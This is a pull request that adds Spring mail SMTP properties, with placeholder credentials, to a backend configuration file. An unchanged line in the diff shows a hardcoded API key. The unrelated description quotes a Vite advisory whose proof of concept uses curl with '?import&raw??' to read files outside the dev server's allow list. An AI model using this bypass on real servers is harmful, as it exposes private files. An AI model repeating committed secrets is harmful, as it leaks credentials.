### PR TITLE
added application properties to allow for spring mail

### DIFF
--- a/parkquest-backend/src/main/resources/application.properties
+++ b/parkquest-backend/src/main/resources/application.properties
@@ -14,3 +14,10 @@ server.port=8081
 
 apiKey=${API_KEY}
 api.key=elO7Wz3Ssdae5mwNNAEzM7fnNjwZZwDq8FR02M5c
+
+spring.mail.host=smtp.mailtrap.io
+spring.mail.port=587
+spring.mail.username=your-username
+spring.mail.password=your-password
+spring.mail.properties.mail.smtp.auth=true
+spring.mail.properties.mail.smtp.starttls.enable=true


### PR DESCRIPTION
There is a security vulnerability stating: Summary
The contents of arbitrary files can be returned to the browser.

Impact
Only apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.

Details
@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

thoughts?